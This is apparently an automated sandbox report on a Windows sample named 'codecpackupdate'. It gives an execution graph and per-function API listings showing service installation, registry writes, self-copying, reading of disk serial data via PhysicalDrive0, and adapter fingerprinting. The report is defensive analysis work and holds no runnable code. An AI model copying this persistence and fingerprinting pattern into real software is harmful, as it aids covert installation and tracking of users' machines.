                                                                          execution_graph 2736 402345 2737 4026a1 StartServiceCtrlDispatcherA 2736->2737 2738 40b5f9 2737->2738 2738->2738 2889 4028c6 2890 402e70 12 API calls 2889->2890 2891 4028cb 2890->2891 2892 402e70 12 API calls 2891->2892 2893 40b467 2892->2893 2893->2893 2809 402748 GetModuleFileNameW 2810 40ba83 2809->2810 2894 4021c9 2895 4021cf 2894->2895 2896 40b6b6 GetModuleHandleA GetModuleFileNameA 2895->2896 2811 40234b 2812 40b15c CreateFileA 2811->2812 2901 4025d6 SetEvent 2902 40babc 2901->2902 2762 4028db RegCloseKey 2763 40286b 2762->2763 2763->2762 2813 40235e 2814 4023b0 2813->2814 2815 402365 2813->2815 2815->2814 2816 402370 GetLastError SetServiceStatus SetEvent 2815->2816 2816->2814 2903 40b4de CreateDirectoryA 2817 40b660 2818 40b673 Sleep 2817->2818 2819 40b93b 2818->2819 2819->2819 2904 404ae0 2905 404ae8 2904->2905 2906 404b7a 2905->2906 2908 4049f0 RtlUnwind 2905->2908 2909 404a08 2908->2909 2909->2905 2820 402561 2822 402566 2820->2822 2821 4028db RegCloseKey 2821->2822 2822->2821 2910 4021e1 2911 4026c0 2910->2911 2912 40220b 2910->2912 2912->2910 2913 40b8d3 LoadLibraryExA 2912->2913 2914 40ba62 2912->2914 2913->2912 2915 4026e2 2916 40b8d3 LoadLibraryExA 2915->2916 2917 4021e1 2916->2917 2917->2916 2918 4026c0 2917->2918 2823 402667 2824 402664 2823->2824 2824->2823 2825 40b681 GetProcAddress 2824->2825 2919 405ce7 2920 405cf5 2919->2920 2921 405cf9 LCMapStringW 2920->2921 2924 405cad 2920->2924 2922 405d11 WideCharToMultiByte 2921->2922 2921->2924 2922->2924 2925 404ae8 2926 404b7a 2925->2926 2928 404b06 2925->2928 2927 4049f0 RtlUnwind 2927->2928 2928->2926 2928->2927 2740 40b3ea 2741 40b577 RegSetValueExA 2740->2741 2826 405e6b 2827 405e72 2826->2827 2828 405ea3 2827->2828 2829 405e7a MultiByteToWideChar 2827->2829 2829->2828 2830 405e93 GetStringTypeW 2829->2830 2830->2828 2932 4024ec 2933 40b5ed WaitForSingleObject 2932->2933 2935 40b6ec Sleep 2831 40b86d ExitProcess 2748 40226e 2749 4022bb 2748->2749 2750 40227b 2748->2750 2751 40b414 lstrcmpiW 2750->2751 2752 402283 2750->2752 2751->2752 2752->2752 2936 40b2ef 2937 40b2f5 VirtualAlloc 2936->2937 2938 40b359 2936->2938 2937->2938 2938->2938 2832 402572 2833 40b000 CreateServiceA 2832->2833 2834 40b69a 2833->2834 2835 402776 GetModuleHandleA 2757 40417b 2758 404187 GetCurrentProcess TerminateProcess 2757->2758 2759 404198 2757->2759 2758->2759 2760 404212 2759->2760 2761 404202 ExitProcess 2759->2761 2802 40b4fc 2803 40b510 2802->2803 2804 40b4d3 CreateDirectoryA 2802->2804 2806 4028fd 2807 40b3c0 RegOpenKeyExA 2806->2807 2808 40b934 2807->2808 2939 4025fd wsprintfA 2940 402741 2939->2940 2836 40217e 2837 402863 GetModuleHandleA 2836->2837 2839 40bb7f 2840 40bba1 RegCloseKey 2839->2840 2841 40bba7 2840->2841 2941 402782 GetTickCount 2743 40b40c 2744 40b4d1 RegQueryValueExA 2743->2744 2745 40b92e 2744->2745 2746 40b822 RegCloseKey 2745->2746 2747 40b934 2745->2747 2746->2745 2942 40b38c CloseServiceHandle 2842 40300d 2849 40416a 2842->2849 2844 403018 2845 403026 2844->2845 2847 404bc0 7 API calls 2844->2847 2846 404bf9 7 API calls 2845->2846 2848 40302f 2846->2848 2847->2845 2850 40417b 3 API calls 2849->2850 2851 404177 2850->2851 2851->2844 2852 40b00d RegCreateKeyExA 2853 40b01b 2852->2853 2753 40b397 2754 40b398 CopyFileA 2753->2754 2756 402661 2754->2756 2756->2756 2421 402f22 GetVersion 2445 40325a HeapCreate 2421->2445 2423 402f81 2424 402f86 2423->2424 2425 402f8e 2423->2425 2520 40303d 2424->2520 2457 404842 2425->2457 2429 402f96 GetCommandLineA 2471 404710 2429->2471 2433 402fb0 2503 40440a 2433->2503 2435 402fb5 2436 402fba GetStartupInfoA 2435->2436 2516 4043b2 2436->2516 2438 402fcc GetModuleHandleA 2440 402ff0 2438->2440 2526 404159 2440->2526 2446 4032b0 2445->2446 2447 40327a 2445->2447 2446->2423 2533 403112 2447->2533 2450 403296 2452 4032b3 2450->2452 2547 403b08 2450->2547 2451 403289 2545 4032b7 HeapAlloc 2451->2545 2452->2423 2455 403293 2455->2452 2456 4032a4 HeapDestroy 2455->2456 2456->2446 2610 402e70 2457->2610 2460 404861 GetStartupInfoA 2467 404972 2460->2467 2470 4048ad 2460->2470 2463 404999 GetStdHandle 2466 4049a7 GetFileType 2463->2466 2463->2467 2464 4049d9 SetHandleCount 2464->2429 2465 402e70 12 API calls 2465->2470 2466->2467 2467->2463 2467->2464 2468 40491e 2468->2467 2469 404940 GetFileType 2468->2469 2469->2468 2470->2465 2470->2467 2470->2468 2472 40472b GetEnvironmentStringsW 2471->2472 2473 40475e 2471->2473 2474 404733 2472->2474 2475 40473f GetEnvironmentStrings 2472->2475 2473->2474 2476 40474f 2473->2476 2478 404777 WideCharToMultiByte 2474->2478 2479 40476b GetEnvironmentStringsW 2474->2479 2475->2476 2477 402fa6 2475->2477 2476->2477 2480 4047f1 GetEnvironmentStrings 2476->2480 2481 4047fd 2476->2481 2494 4044c3 2477->2494 2483 4047ab 2478->2483 2484 4047dd FreeEnvironmentStringsW 2478->2484 2479->2477 2479->2478 2480->2477 2480->2481 2485 402e70 12 API calls 2481->2485 2486 402e70 12 API calls 2483->2486 2484->2477 2488 404818 2485->2488 2487 4047b1 2486->2487 2487->2484 2489 4047ba WideCharToMultiByte 2487->2489 2490 40482e FreeEnvironmentStringsA 2488->2490 2491 4047d4 2489->2491 2492 4047cb 2489->2492 2490->2477 2491->2484 2676 403061 2492->2676 2495 4044d5 2494->2495 2496 4044da GetModuleFileNameA 2494->2496 2706 40583b 2495->2706 2498 4044fd 2496->2498 2499 402e70 12 API calls 2498->2499 2500 40451e 2499->2500 2501 403018 7 API calls 2500->2501 2502 40452e 2500->2502 2501->2502 2502->2433 2504 404417 2503->2504 2506 40441c 2503->2506 2505 40583b 19 API calls 2504->2505 2505->2506 2507 402e70 12 API calls 2506->2507 2508 404449 2507->2508 2509 403018 7 API calls 2508->2509 2512 40445d 2508->2512 2509->2512 2510 403061 7 API calls 2511 4044ac 2510->2511 2511->2435 2513 4044a0 2512->2513 2514 402e70 12 API calls 2512->2514 2515 403018 7 API calls 2512->2515 2513->2510 2514->2512 2515->2512 2517 4043bb 2516->2517 2519 4043c0 2516->2519 2518 40583b 19 API calls 2517->2518 2518->2519 2519->2438 2521 403046 2520->2521 2522 40304b 2520->2522 2523 404bc0 7 API calls 2521->2523 2524 404bf9 7 API calls 2522->2524 2523->2522 2525 403054 ExitProcess 2524->2525 2730 40417b 2526->2730 2529 40422e 2530 40423a 2529->2530 2531 404363 UnhandledExceptionFilter 2530->2531 2532 40300a 2530->2532 2531->2532 2556 402d50 2533->2556 2536 403155 GetEnvironmentVariableA 2538 403232 2536->2538 2541 403174 2536->2541 2537 40313b 2537->2536 2540 40314d 2537->2540 2538->2540 2561 4030e5 GetModuleHandleA 2538->2561 2540->2450 2540->2451 2542 4031b9 GetModuleFileNameA 2541->2542 2543 4031b1 2541->2543 2542->2543 2543->2538 2558 404d4c 2543->2558 2546 4032d3 2545->2546 2546->2455 2548 403b15 2547->2548 2549 403b1c HeapAlloc 2547->2549 2550 403b39 VirtualAlloc 2548->2550 2549->2550 2555 403b71 2549->2555 2551 403b59 VirtualAlloc 2550->2551 2552 403c2e 2550->2552 2553 403c20 VirtualFree 2551->2553 2551->2555 2554 403c36 HeapFree 2552->2554 2552->2555 2553->2552 2554->2555 2555->2455 2557 402d5c GetVersionExA 2556->2557 2557->2536 2557->2537 2563 404d63 2558->2563 2562 4030fc 2561->2562 2562->2540 2565 404d7b 2563->2565 2567 404dab 2565->2567 2570 405aaa 2565->2570 2566 405aaa 6 API calls 2566->2567 2567->2566 2569 404d5f 2567->2569 2574 4059de 2567->2574 2569->2538 2571 405ac8 2570->2571 2573 405abc 2570->2573 2580 405d6e 2571->2580 2573->2565 2575 405a09 2574->2575 2579 4059ec 2574->2579 2576 405a25 2575->2576 2577 405aaa 6 API calls 2575->2577 2576->2579 2592 405b1f 2576->2592 2577->2576 2579->2567 2581 405d9f GetStringTypeW 2580->2581 2583 405db7 2580->2583 2582 405dbb GetStringTypeA 2581->2582 2581->2583 2582->2583 2587 405ea3 2582->2587 2584 405de2 GetStringTypeA 2583->2584 2586 405e06 2583->2586 2584->2587 2586->2587 2588 405e1c MultiByteToWideChar 2586->2588 2587->2573 2588->2587 2589 405e40 2588->2589 2589->2587 2590 405e7a MultiByteToWideChar 2589->2590 2590->2587 2591 405e93 GetStringTypeW 2590->2591 2591->2587 2593 405b6b 2592->2593 2594 405b4f LCMapStringW 2592->2594 2596 405bb4 LCMapStringA 2593->2596 2597 405bd1 2593->2597 2594->2593 2595 405b73 LCMapStringA 2594->2595 2595->2593 2604 405cad 2595->2604 2596->2604 2598 405be7 MultiByteToWideChar 2597->2598 2597->2604 2599 405c11 2598->2599 2598->2604 2600 405c47 MultiByteToWideChar 2599->2600 2599->2604 2601 405c60 LCMapStringW 2600->2601 2600->2604 2602 405c7b 2601->2602 2601->2604 2603 405c81 2602->2603 2606 405cc1 2602->2606 2603->2604 2605 405c8f LCMapStringW 2603->2605 2604->2579 2605->2604 2606->2604 2607 405cf9 LCMapStringW 2606->2607 2607->2604 2608 405d11 WideCharToMultiByte 2607->2608 2608->2604 2619 402e82 2610->2619 2613 403018 2614 403021 2613->2614 2615 403026 2613->2615 2656 404bc0 2614->2656 2662 404bf9 2615->2662 2620 402e7f 2619->2620 2622 402e89 2619->2622 2620->2460 2620->2613 2622->2620 2623 402eae 2622->2623 2624 402ed2 2623->2624 2625 402ebd 2623->2625 2627 402f11 HeapAlloc 2624->2627 2631 402ecb 2624->2631 2638 403e00 2624->2638 2625->2631 2632 403653 2625->2632 2628 402f20 2627->2628 2628->2622 2629 402ed0 2629->2622 2631->2627 2631->2628 2631->2629 2633 403685 2632->2633 2634 403724 2633->2634 2636 403733 2633->2636 2645 40395c 2633->2645 2634->2636 2652 403a0d 2634->2652 2636->2631 2639 403e0e 2638->2639 2640 403fcf 2639->2640 2641 403efa VirtualAlloc 2639->2641 2644 403ecb 2639->2644 2642 403b08 5 API calls 2640->2642 2641->2644 2642->2644 2644->2631 2646 40399f HeapAlloc 2645->2646 2647 40396f HeapReAlloc 2645->2647 2649 4039ef 2646->2649 2650 4039c5 VirtualAlloc 2646->2650 2648 40398e 2647->2648 2647->2649 2648->2646 2649->2634 2650->2649 2651 4039df HeapFree 2650->2651 2651->2649 2653 403a1f VirtualAlloc 2652->2653 2655 403a68 2653->2655 2655->2636 2657 404bca 2656->2657 2658 404bf7 2657->2658 2659 404bf9 7 API calls 2657->2659 2658->2615 2660 404be1 2659->2660 2661 404bf9 7 API calls 2660->2661 2661->2658 2664 404c0c 2662->2664 2663 404d23 2667 404d36 GetStdHandle WriteFile 2663->2667 2664->2663 2665 404c4c 2664->2665 2670 40302f 2664->2670 2666 404c58 GetModuleFileNameA 2665->2666 2665->2670 2668 404c70 2666->2668 2667->2670 2671 405857 2668->2671 2670->2460 2672 405864 LoadLibraryA 2671->2672 2674 4058a6 2671->2674 2673 405875 GetProcAddress 2672->2673 2672->2674 2673->2674 2675 40588c GetProcAddress GetProcAddress 2673->2675 2674->2670 2675->2674 2677 403089 2676->2677 2678 40306d 2676->2678 2677->2491 2679 403077 2678->2679 2680 40308d 2678->2680 2682 4030b9 HeapFree 2679->2682 2683 403083 2679->2683 2681 4030b8 2680->2681 2684 4030a7 2680->2684 2681->2682 2682->2677 2687 40332a 2683->2687 2693 403dbb 2684->2693 2688 403368 2687->2688 2692 40361e 2687->2692 2689 403564 VirtualFree 2688->2689 2688->2692 2690 4035c8 2689->2690 2691 4035d7 VirtualFree HeapFree 2690->2691 2690->2692 2691->2692 2692->2677 2694 403de8 2693->2694 2695 403dfe 2693->2695 2694->2695 2697 403ca2 2694->2697 2695->2677 2700 403caf 2697->2700 2698 403d5f 2698->2695 2699 403cd0 VirtualFree 2699->2700 2700->2698 2700->2699 2702 403c4c VirtualFree 2700->2702 2703 403c69 2702->2703 2704 403c99 2703->2704 2705 403c79 HeapFree 2703->2705 2704->2700 2705->2700 2707 405844 2706->2707 2708 40584b 2706->2708 2710 405477 2707->2710 2708->2496 2717 405610 2710->2717 2712 405604 2712->2708 2715 4054ba GetCPInfo 2716 4054ce 2715->2716 2716->2712 2722 4056b6 GetCPInfo 2716->2722 2718 405630 2717->2718 2719 405620 GetOEMCP 2717->2719 2720 405488 2718->2720 2721 405635 GetACP 2718->2721 2719->2718 2720->2712 2720->2715 2720->2716 2721->2720 2723 4056d9 2722->2723 2729 4057a1 2722->2729 2724 405d6e 6 API calls 2723->2724 2725 405755 2724->2725 2726 405b1f 9 API calls 2725->2726 2727 405779 2726->2727 2728 405b1f 9 API calls 2727->2728 2728->2729 2729->2712 2731 404187 GetCurrentProcess TerminateProcess 2730->2731 2732 404198 2730->2732 2731->2732 2733 402ff9 2732->2733 2734 404202 ExitProcess 2732->2734 2733->2529 2854 402322 2855 402324 Sleep 2854->2855 2857 40b93b 2855->2857 2735 40b323 OpenSCManagerA 2858 402223 2860 40b055 2858->2860 2859 4022ba 2860->2859 2862 401f64 FindResourceA 2860->2862 2863 401f86 GetLastError SizeofResource 2862->2863 2864 401f9f 2862->2864 2863->2864 2865 401fa6 LoadResource LockResource GlobalAlloc 2863->2865 2864->2859 2866 401fd2 2865->2866 2867 401ffb GetTickCount 2866->2867 2869 402005 GlobalAlloc 2867->2869 2869->2864 2739 4028a6 RegCreateKeyExA 2870 40222b 2871 40b4bb GetLastError 2870->2871 2943 4021ae 2944 402514 wsprintfA 2943->2944 2873 405c33 2874 405c42 2873->2874 2875 405c47 MultiByteToWideChar 2874->2875 2876 405cad 2874->2876 2875->2876 2877 405c60 LCMapStringW 2875->2877 2877->2876 2878 405c7b 2877->2878 2879 405c81 2878->2879 2881 405cc1 2878->2881 2879->2876 2880 405c8f LCMapStringW 2879->2880 2880->2876 2881->2876 2882 405cf9 LCMapStringW 2881->2882 2882->2876 2883 405d11 WideCharToMultiByte 2882->2883 2883->2876 2946 4023b3 RegisterServiceCtrlHandlerA 2947 4023d6 2946->2947 2948 4024cc 2946->2948 2949 4023e4 SetServiceStatus GetLastError CreateEventA 2947->2949 2950 40245d SetServiceStatus CreateThread WaitForSingleObject CloseHandle 2949->2950 2951 40243e GetLastError 2949->2951 2952 4024c3 SetServiceStatus 2950->2952 2951->2952 2952->2948 2953 4025b8 CloseHandle 2954 40b8a2 ExitProcess 2953->2954 2955 4026ba 2956 40b0d5 RegSetValueExA 2955->2956 2958 40bba1 RegCloseKey 2956->2958 2959 40bba7 2958->2959 2885 40b33b 2886 40b344 CopyFileA 2885->2886 2888 402661 2886->2888 2764 40223c GetCommandLineW 2765 40b040 CommandLineToArgvW 2764->2765 2766 40b942 GetLocalTime 2765->2766 2769 401f27 2766->2769 2770 401f3c 2769->2770 2773 401a1d 2770->2773 2772 401f45 2774 401a2c 2773->2774 2779 401a4f CreateFileA 2774->2779 2778 401a3e 2778->2772 2780 401a35 2779->2780 2786 401a7d 2779->2786 2787 401b4b LoadLibraryA 2780->2787 2781 401a98 DeviceIoControl 2781->2786 2783 401b3a FindCloseChangeNotification 2783->2780 2784 401b0e GetLastError 2784->2783 2784->2786 2786->2781 2786->2783 2786->2784 2796 402cb6 2786->2796 2799 402ca8 2786->2799 2788 401c21 2787->2788 2789 401b6e GetProcAddress 2787->2789 2788->2778 2790 401c18 FreeLibrary 2789->2790 2792 401b85 2789->2792 2790->2788 2791 401b95 GetAdaptersInfo 2791->2792 2792->2791 2793 402cb6 7 API calls 2792->2793 2794 401c15 2792->2794 2795 402ca8 12 API calls 2792->2795 2793->2792 2794->2790 2795->2792 2797 403061 7 API calls 2796->2797 2798 402cbf 2797->2798 2798->2786 2800 402e82 12 API calls 2799->2800 2801 402cb3 2800->2801 2801->2786

                                                                          Executed Functions

                                                                          Function 00401B4B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 74libraryloaderCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • LoadLibraryA.KERNELBASE(iphlpapi.dll), ref: 00401B5D
                                                                          • GetProcAddress.KERNEL32(00000000,GetAdaptersInfo), ref: 00401B74
                                                                          • GetAdaptersInfo.IPHLPAPI(?,00000400), ref: 00401B9D
                                                                          • FreeLibrary.KERNEL32(00401A3E), ref: 00401C1B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Library$AdaptersAddressFreeInfoLoadProc
                                                                          • String ID: GetAdaptersInfo$iphlpapi.dll$o
                                                                          • API String ID: 514930453-3667123677
                                                                          • Opcode ID: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                          • Instruction ID: 989bf52404031a28807fba390b80e1364536d7dfce6c2044dfeb9dc774225594
                                                                          • Opcode Fuzzy Hash: ccb5438453e322dee9fbf1b1f0840e02b8e5c840e37394e15fd7fcb2dc755fc2
                                                                          • Instruction Fuzzy Hash: F521B870944209AFEF21DF65C9447EF7BB8EF41344F1440BAE504B22E1E7789985CB69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00401A4F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 26 401a4f-401a77 CreateFileA 27 401b45-401b4a 26->27 28 401a7d-401a91 26->28 29 401a98-401ac0 DeviceIoControl 28->29 30 401ac2-401aca 29->30 31 401af3-401afb 29->31 34 401ad4-401ad9 30->34 35 401acc-401ad2 30->35 32 401b04-401b07 31->32 33 401afd-401b03 call 402cb6 31->33 38 401b09-401b0c 32->38 39 401b3a-401b44 FindCloseChangeNotification 32->39 33->32 34->31 36 401adb-401af1 call 402cd0 call 4018cc 34->36 35->31 36->31 42 401b27-401b34 call 402ca8 38->42 43 401b0e-401b17 GetLastError 38->43 39->27 42->29 42->39 43->39 46 401b19-401b1c 43->46 46->42 49 401b1e-401b24 46->49 49->42
                                                                          APIs
                                                                          • CreateFileA.KERNELBASE(\\.\PhysicalDrive0,00000000,00000007,00000000,00000003,00000000,00000000), ref: 00401A6B
                                                                          • DeviceIoControl.KERNELBASE(?,002D1400,?,0000000C,?,00000400,00000400,00000000), ref: 00401AB2
                                                                          • GetLastError.KERNEL32 ref: 00401B0E
                                                                          • FindCloseChangeNotification.KERNELBASE(?), ref: 00401B3D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: ChangeCloseControlCreateDeviceErrorFileFindLastNotification
                                                                          • String ID: \\.\PhysicalDrive0
                                                                          • API String ID: 3786717961-1180397377
                                                                          • Opcode ID: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                          • Instruction ID: 4be7cd3f819721d39b4e681a90ac86abf8c5b8a7a35c169795375fcfafce56b7
                                                                          • Opcode Fuzzy Hash: 89700505a12f282f270db25e62f1f83fcd7e168e5d3770c0c1e857fe250e7073
                                                                          • Instruction Fuzzy Hash: 5E31AB71D00218EADB21EFA5CD809EFBBB8FF41750F20407AE514B22A0E3785E41CB98
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402345 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 159 402345-4026a8 StartServiceCtrlDispatcherA 161 40b5f9 159->161 161->161
                                                                          APIs
                                                                          • StartServiceCtrlDispatcherA.ADVAPI32 ref: 004026A1
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CtrlDispatcherServiceStart
                                                                          • String ID:
                                                                          • API String ID: 3789849863-0
                                                                          • Opcode ID: 6dc742ed42f21e6c69dac81c81aca4cf90024d9fc7185b2147acdb0c855cd8ac
                                                                          • Instruction ID: 40a2f8b49cbd42c4c1ae9a929fb38234da1fb277cd8ec946056b9c6573f4ebba
                                                                          • Opcode Fuzzy Hash: 6dc742ed42f21e6c69dac81c81aca4cf90024d9fc7185b2147acdb0c855cd8ac
                                                                          • Instruction Fuzzy Hash: E1A011A020C20AEACA0002808A0C0B2A00CA30A32AB3008B3200FB00C282BC802238AF
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00402F22 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 75COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetVersion.KERNEL32 ref: 00402F48
                                                                            • Part of subcall function 0040325A: HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                            • Part of subcall function 0040325A: HeapDestroy.KERNEL32 ref: 004032AA
                                                                          • GetCommandLineA.KERNEL32 ref: 00402F96
                                                                          • GetStartupInfoA.KERNEL32(?), ref: 00402FC1
                                                                          • GetModuleHandleA.KERNEL32(00000000,00000000,?,0000000A), ref: 00402FE4
                                                                            • Part of subcall function 0040303D: ExitProcess.KERNEL32 ref: 0040305A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Heap$CommandCreateDestroyExitHandleInfoLineModuleProcessStartupVersion
                                                                          • String ID: h5`
                                                                          • API String ID: 2057626494-1443291236
                                                                          • Opcode ID: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                          • Instruction ID: 0a95150e04a59658555c79dd88d1413615d8933c927d5f415567a3b7127da264
                                                                          • Opcode Fuzzy Hash: 4c4ec3abad10afb3f5883e2b41922209f0fc22101904852709d3b5132570f021
                                                                          • Instruction Fuzzy Hash: 32218EB19407059BDB08AFA6DE49A6E7BB9EF44304F10413EFA05BB2E1DB384550CB99
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040417B Relevance: 4.5, APIs: 3, Instructions: 49COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 79 40417b-404185 80 404187-404192 GetCurrentProcess TerminateProcess 79->80 81 404198-4041ae 79->81 80->81 82 4041b0-4041b7 81->82 83 4041ec-404200 call 404214 81->83 84 4041b9-4041c5 82->84 85 4041db-4041eb call 404214 82->85 94 404212-404213 83->94 95 404202-40420c ExitProcess 83->95 87 4041c7-4041cb 84->87 88 4041da 84->88 85->83 91 4041cd 87->91 92 4041cf-4041d8 87->92 88->85 91->92 92->87 92->88
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(?,?,00404166,?,00000000,00000000,00402FF9,00000000,00000000), ref: 0040418B
                                                                          • TerminateProcess.KERNEL32(00000000,?,00404166,?,00000000,00000000,00402FF9,00000000,00000000), ref: 00404192
                                                                          • ExitProcess.KERNEL32 ref: 0040420C
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: Process$CurrentExitTerminate
                                                                          • String ID:
                                                                          • API String ID: 1703294689-0
                                                                          • Opcode ID: c2260ba4ba3a7ce087c0bc5af1c4df8ffe5f30a9fab647541faefa4ff898e018
                                                                          • Instruction ID: 513b21a01c22477a45cfaa627a8dde47c11b7c557bbe69d9200b46c06abf8301
                                                                          • Opcode Fuzzy Hash: c2260ba4ba3a7ce087c0bc5af1c4df8ffe5f30a9fab647541faefa4ff898e018
                                                                          • Instruction Fuzzy Hash: 36012DB1644301DADA10AF64FD8CA0A77A4EBE0350B10457FF6417B2E0C739A8D1CB2E
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040223C Relevance: 4.5, APIs: 3, Instructions: 12timeCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetCommandLineW.KERNEL32 ref: 0040223C
                                                                          • CommandLineToArgvW.SHELL32(00000000), ref: 0040B040
                                                                          • GetLocalTime.KERNEL32(00409FB8), ref: 0040B942
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CommandLine$ArgvLocalTime
                                                                          • String ID:
                                                                          • API String ID: 3768950922-0
                                                                          • Opcode ID: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
                                                                          • Instruction ID: fe59c91cec6a1bbfec2f2a739a0674a99631b7336b4ea49b5c82aa235aaf9e13
                                                                          • Opcode Fuzzy Hash: f727ac15d8a02c0163e01fb7637a754121b5fc1ed335fb52cb76b17d48f4068b
                                                                          • Instruction Fuzzy Hash: F4D01273448012EBC2007BE19A0E99D37E5A64A3523224077F243F11E1CB3C44959B6F
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040B33B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25fileCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 103 40b33b-40b342 104 40b344-40b349 103->104 105 40b398-40ba76 CopyFileA 103->105 104->105 107 402760-402761 105->107 108 40ba7c 105->108 110 40ba7e 108->110 110->110
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000002.00000002.1620504748.0000000000409000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000002.00000002.1620504748.0000000000400000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_2_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: CopyFile
                                                                          • String ID: ?NI
                                                                          • API String ID: 1304948518-117959909
                                                                          • Opcode ID: 1ba00870fd27b3cdf3e8498eb1257aa92a605fb7dfbe0c732b82863bd5f53ab8
                                                                          • Instruction ID: c2822da89412b159851219babc5dd957992176794b394267062855fcf32f5c0e
                                                                          • Opcode Fuzzy Hash: 1ba00870fd27b3cdf3e8498eb1257aa92a605fb7dfbe0c732b82863bd5f53ab8
                                                                          • Instruction Fuzzy Hash: 77D02B3138921246CD0265242E0EAF67309C7A3349B241977ED07FF2C0D1B9861762CD
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 0040325A Relevance: 3.0, APIs: 2, Instructions: 30memoryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 112 40325a-403278 HeapCreate 113 4032b0-4032b2 112->113 114 40327a-403287 call 403112 112->114 117 403296-403299 114->117 118 403289-403294 call 4032b7 114->118 119 4032b3-4032b6 117->119 120 40329b call 403b08 117->120 124 4032a0-4032a2 118->124 120->124 124->119 125 4032a4-4032aa HeapDestroy 124->125 125->113
                                                                          APIs
                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,00402F81,00000000), ref: 0040326B
                                                                            • Part of subcall function 00403112: GetVersionExA.KERNEL32 ref: 00403131
                                                                          • HeapDestroy.KERNEL32 ref: 004032AA
                                                                            • Part of subcall function 004032B7: HeapAlloc.KERNEL32(00000000,00000140,00403293,000003F8), ref: 004032C4
                                                                          Memory Dump Source
